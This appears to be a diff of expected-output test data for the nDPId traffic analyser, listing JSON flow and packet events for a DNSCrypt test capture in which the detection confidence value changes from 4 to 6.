AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":50387,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":50387,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":40138,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":946739318061,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAAIcXcpAAL0RQhYKAAABjgTNL5zKAbsCCB4KqloBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 
-00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":40138,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":40138,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":352,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739318061} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":352,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAABQXckAub0RgyoKAAABjgTNLwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":353,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":51935,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":946739318061,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAAXcXcsgAL0RXlUKAAABjgTNL8rfAbsGBBssqlcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":51935,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":51935,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":354,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739318061} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":354,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAABQXcsAub0RgygKAAABjgTNLwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":54096,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":946739318061,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAAXcXcwgAL0RXlQKAAABjgTNL9NQAbsGBBK3qlsBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":355,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":54096,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":355,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":54096,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":2,"flow_last_seen":946739318061,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":946739318061,"pkt":"ZmZmZmZmRERERERECABFAADX+4lAADQRFDCXUN5PCgAAAQG7y0gAw+xKXDCBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADbIkde1\/iXw9F8aP3hFzW\/UlCbjrsaMoYt8+MW53XVHmJZ40u2KJ1Y5p9+bOkgm9KOg6J\/Jk5OIIo5rrGKNcsPhxVktS2XlAVyckcTA1HXSkhBDvC7R+LCFU83mg2ymgqHFWS1LZeUBQAAAAFfU5R+X1Tl\/g=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":357,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739318061} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":357,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAABQXcwAub0RgycKAAABjgTNLwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":35903,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":946739318061,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAAIcXc1AAL0RQhMKAAABjgTNL4w\/AbsCCB4KqlgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":35903,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":35903,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":2,"flow_last_seen":946739318061,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":946739318061,"pkt":"ZmZmZmZmRERERERECABFAADX+4pAADQRFC+XUN5PCgAAAQG74SQAw9ZtXDGBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADbIkde1\/iXw9F8aP3hFzW\/UlCbjrsaMoYt8+MW53XVHmJZ40u2KJ1Y5p9+bOkgm9KOg6J\/Jk5OIIo5rrGKNcsPhxVktS2XlAVyckcTA1HXSkhBDvC7R+LCFU83mg2ymgqHFWS1LZeUBQAAAAFfU5R+X1Tl\/g=="} 
